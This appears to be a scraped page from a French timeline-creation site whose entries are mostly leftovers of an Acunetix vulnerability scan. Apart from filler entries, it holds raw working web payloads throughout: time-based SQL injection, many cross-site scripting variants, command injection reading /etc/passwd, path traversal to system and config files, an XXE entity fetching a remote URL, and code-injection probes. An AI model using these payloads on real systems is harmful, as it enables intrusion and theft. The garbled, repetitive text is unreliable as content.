| 1 jan. : '"'");|]*{ <>''
| 1 jan. :
| 1 jan. : ;print(md5(acunetix_wvs_security_test));
| 1 jan. : ';print(md5(acunetix_wvs_security_test));$a='
| 1 jan. : ";print(md5(acunetix_wvs_security_test));$a="
| 1 jan. : ${@print(md5(acunetix_wvs_security_test))}
| 1 jan. : ${@print(md5(acunetix_wvs_security_test))}
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : acunetix_wvs_invalid_filename
| 1 jan. : frises_creer.php
| 1 jan. : frises_creer.php
| 1 jan. : frises_creer.php/.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : http://www.acunetix.tst
| 1 jan. : <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : '"
| 1 jan. : <!--
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.' and sleep(4)='
| 1 jan. : Mr.' and (sleep(4)+1) limit 1 --
| 1 jan. : Mr." and sleep(4)="
| 1 jan. : Mr.' or (sleep(4)+1) limit 1 --
| 1 jan. : Mr." or (sleep(4)+1) limit 1 --
| 1 jan. : Mr.'=sleep(4)='
| 1 jan. : Mr."=sleep(4)="
| 1 jan. : Mr.'+(select 1 from (select sleep(4))A)+'
| 1 jan. : Mr. and sleep(4)
| 1 jan. : Mr. or (sleep(4)+1) limit 1 --
| 1 jan. : Mr.';select pg_sleep(4); --
| 1 jan. : Mr.'; waitfor delay '0:0:4' --
| 1 jan. : Mr."; waitfor delay '0:0:4' --
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.'"()&%<ScRiPt >prompt(952347)</ScRiPt>
| 1 jan. : Mr._960820
| 1 jan. : acu2965<s1﹥s2ʺs3ʹuca2965
| 1 jan. : acux4163z1z2abcxuca4163
| 1 jan. : Mr.<ScRiPt >prompt(937055)</ScRiPt>
| 1 jan. : Mr.<script>prompt(953337)</script>
| 1 jan. : Mr.<ScRiPt >prompt(951212)</ScRiPt>
| 1 jan. : Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952562></ScRiPt>
| 1 jan. : Mr.<ScRiPt >prompt(921432)</ScRiPt>
| 1 jan. : Mr.<video><source onerror="javascript:prompt(965898)">
| 1 jan. : Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947668)"></g></svg>
| 1 jan. : Mr.<div style=width:expression(prompt(972524))>
| 1 jan. : Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='993776'>
| 1 jan. : Mr.<body onload=prompt(909966)>
| 1 jan. : Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910589)>
| 1 jan. : Mr.<img src=xyz OnErRor=prompt(941374)>
| 1 jan. : Mr.<img/src=">" onerror=alert(983681)>
| 1 jan. : Mr.%3CScRiPt%20%3Eprompt(923723)%3C/sCripT%3E
| 1 jan. : <img acu onmouseover=prompt(929555) //>
| 1 jan. : Mr.<input autofocus onfocus=prompt(907446)>
| 1 jan. : <a href='http://www.acunetix.com'>website security</a>
| 1 jan. : <a href='http://www.acunetix.com'>website security</a>
| 1 jan. : <a href='http://www.acunetix.com'>website security</a>
| 1 jan. : [url=http://www.acunetix.com]website security[/url]
| 1 jan. : Mr._Vu6Bu <ScRiPt >prompt(923301)</ScRiPt>
| 1 jan. : Mr._Vu6Bu <ScRiPt >prompt(923301)</ScRiPt>
| 1 jan. : <a href='http://www.acunetix.com'>website security</a>
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : &cat /etc/passwd&
| 1 jan. : '&cat /etc/passwd&'
| 1 jan. : "&cat /etc/passwd&"
| 1 jan. : cat /etc/passwd
| 1 jan. : `cat /etc/passwd`
| 1 jan. : |cat /etc/passwd#
| 1 jan. : '|'ld
| 1 jan. : "|"ld
| 1 jan. : ;cat /etc/passwd;
| 1 jan. : ';cat /etc/passwd;'
| 1 jan. : ";cat /etc/passwd;"
| 1 jan. : ||cat /etc/passwd
| 1 jan. : &dir
| 1 jan. : '&dir&'
| 1 jan. : "&dir&"
| 1 jan. : |dir
| 1 jan. : '|dir
| 1 jan. : "|dir
| 1 jan. : Mr.
| 1 jan. : 1'"
| 1 jan. :
| 1 jan. : 1xa7
| 1 jan. : @@Ud2FA
| 1 jan. : JyI=
| 1 jan. : '"
| 1 jan. : ''""
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : ../../../../../../../../../../etc/passwd
| 1 jan. : ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.
| 1 jan. : ../../../../../../../../../../etc/passwd.
| 1 jan. : Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
| 1 jan. : ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.
| 1 jan. : /../..//../..//../..//../..//../..//etc/passwd.
| 1 jan. : .\./.\./.\./.\./.\./.\./etc/passwd
| 1 jan. : /etc/passwd
| 1 jan. : ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
| 1 jan. : ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
| 1 jan. : ................etc/passwd
| 1 jan. : invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
| 1 jan. : file:///etc/passwd
| 1 jan. : /../../../../../../../etc/passwd
| 1 jan. : WEB-INF/web.xml
| 1 jan. : WEB-INFweb.xml
| 1 jan. : ../../../../../../../../../../windows/win.ini
| 1 jan. : ../../../../../../../../../../boot.ini
| 1 jan. : ../../../../../../../../../../windows/win.ini.
| 1 jan. : windowswin.ini
| 1 jan. : ................windowswin.ini
| 1 jan. : ................windowswin.ini
| 1 jan. : /.\./.\./.\./.\./.\./.\./windows/win.ini
| 1 jan. : ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
| 1 jan. : ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
| 1 jan. : unexisting/../../../../../../../../../../windows/win.ini....................................................................................................
| 1 jan. : WEB-INF/web.xml
| 1 jan. : WEB-INFweb.xml
| 1 jan. :
| 1 jan. :
| 1 jan. : les grands evenements
| 1 jan. : Zoroastre
| 1 jan. : Mr.
| 1 jan. :
| 1 jan. :
| 1 jan. : Mr.
| -1 jan. 1 : Mr.
| -1 jan. 1 : Mr.
| -1 jan. 1 : Mr.
| -1 jan. 1 : Mr.
| -1 jan. 1 : Mr.
| -1 jan. 1 : Mr.
| NF jan. 10 : Mr.
| 15 101&n9 : Mr.
| 1 oct. 10 : Mr.
| %< 101'"( : Mr.
| 84 101_93 : Mr.
| %< 101'"( : Mr.
| 94 101_99 : Mr.
| %< 101'"( : Mr.
| 40 101_99 : Mr.
| 1 jan. : cxvvvvvvv
| 1 jan. : Bartelomeu Dias
| 1 jan. : Peiniture
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.
| 1 jan. : Mr.'"()&%
| 1 jan. : Mr.;909872
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : SomeCustomInjectedHeader:injected_by_wvs
| 2 jan. : SomeCustomInjectedHeader:injected_by_wvs
| 2 jan. : SomeCustomInjectedHeader:injected_by_wvs
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : response.write(9835505*9479464)
| 2 jan. : '+response.write(9835505*9479464)+'
| 2 jan. : "+response.write(9835505*9479464)+"
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : ${100282+99953}
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. :
| 2 jan. : Mr.
| 2 jan. : '"()
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : )
| 2 jan. : !(()&&!|*|*|
| 2 jan. : ^(#$!@#$)(()))******
| 2 jan. : http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.
| 2 jan. : 1some_inexistent_file_with_long_name%00.
| 2 jan. : http://testasp.vulnweb.com/t/fit.txt?%00.
| 2 jan. : testasp.vulnweb.com
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : http://testasp.vulnweb.com/t/xss.html?%00.jpg
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : http://testasp.vulnweb.com/t/fit.txt
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. :
| 2 jan. : 268435455
| 2 jan. : h
| 2 jan. : ..
| 2 jan. : 1e309
| 2 jan. : ;print(md5(acunetix_wvs_security_test));
| 2 jan. : '"'");|]*{ <>''
| 2 jan. :
| 2 jan. : ';print(md5(acunetix_wvs_security_test));$a='
| 2 jan. : ";print(md5(acunetix_wvs_security_test));$a="
| 2 jan. : ${@print(md5(acunetix_wvs_security_test))}
| 2 jan. : ${@print(md5(acunetix_wvs_security_test))}
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : acunetix_wvs_invalid_filename
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : frises_creer.php
| 2 jan. : frises_creer.php
| 2 jan. : Mr.
| 2 jan. : frises_creer.php/.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : http://www.acunetix.tst
| 2 jan. : <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : '"
| 2 jan. : <!--
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.' and sleep(4)='
| 2 jan. : Mr.' and (sleep(4)+1) limit 1 --
| 2 jan. : Mr." and sleep(4)="
| 2 jan. : Mr.' or (sleep(4)+1) limit 1 --
| 2 jan. : Mr." or (sleep(4)+1) limit 1 --
| 2 jan. : Mr.'=sleep(4)='
| 2 jan. : Mr."=sleep(4)="
| 2 jan. : Mr.'+(select 1 from (select sleep(4))A)+'
| 2 jan. : Mr. and sleep(4)
| 2 jan. : Mr. or (sleep(4)+1) limit 1 --
| 2 jan. : Mr.
| 2 jan. : Mr.
| 2 jan. : Mr.';select pg_sleep(4); --
| 2 jan. : Mr.';select pg_sleep(4); --
| 2 jan. : Mr.'; waitfor delay '0:0:4' --
| 2 jan. : Mr."; waitfor delay '0:0:4' --
| 2 jan. : Mr.'"()&%<ScRiPt >prompt(906734)</ScRiPt>
| 2 jan. : Mr._942779
| 2 jan. : Mr._942779
| 2 jan. : acu8886<s1﹥s2ʺs3ʹuca8886
| 2 jan. : acux3969z1z2abcxuca3969
| 2 jan. : Mr.<ScRiPt >prompt(957136)</ScRiPt>
| 2 jan. : Mr.<script>prompt(948079)</script>
| 2 jan. : Mr.<script>prompt(948079)</script>
| 2 jan. : Mr.<script>prompt(948079)</script>
| 2 jan. : Mr.<ScRiPt >prompt(959505)</ScRiPt>
| 2 jan. : Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983265></ScRiPt>
| 2 jan. : Mr.<ScRiPt >prompt(988312)</ScRiPt>
| 2 jan. : Mr.<video><source onerror="javascript:prompt(965970)">
| 2 jan. : Mr.<video><source onerror="javascript:prompt(965970)">
| 2 jan. : Mr.<video><source onerror="javascript:prompt(965970)">
| 2 jan. : Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(916331)"></g></svg>
| 2 jan. : Mr.<video><source onerror="javascript:prompt(965970)">
| 2 jan. : Mr.<div style=width:expression(prompt(973522))>
| 2 jan. : Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='981474'>
| 2 jan. : Mr.<body onload=prompt(983446)>
| 2 jan. : Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(903184)>
| 2 jan. : Mr.<img src=xyz OnErRor=prompt(972726)>
| 2 jan. : Mr.<img/src=">" onerror=alert(981800)>
| 2 jan. : Mr.%3CScRiPt%20%3Eprompt(985708)%3C/sCripT%3E
| 2 jan. : <img acu onmouseover=prompt(930277) //>
| 2 jan. : Mr.<input autofocus onfocus=prompt(979049)>
| 2 jan. : <a href='http://www.acunetix.com'>website security</a>
| 2 jan. : [url=http://www.acunetix.com]website security[/url]
| 2 jan. : Mr._RbIuV <ScRiPt >prompt(951673)</ScRiPt>
| 2 jan. : acu6052<s1﹥s2ʺs3ʹuca6052
| 2 jan. : acux6478z1z2abcxuca6478
| 2 jan. : acux6478z1z2abcxuca6478
| 2 jan. : acux6478z1z2abcxuca6478
| 2 jan. : Mr.<ScRiPt >prompt(915539)</ScRiPt>
| 2 jan. : Mr.<script>prompt(979505)</script>
| 2 jan. : Mr.<ScRiPt >prompt(936787)</ScRiPt>
| 2 jan. : Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942735></ScRiPt>
| 2 jan. : Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942735></ScRiPt>
| 2 jan. : Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942735></ScRiPt>
| 2 jan. : Mr.<ScRiPt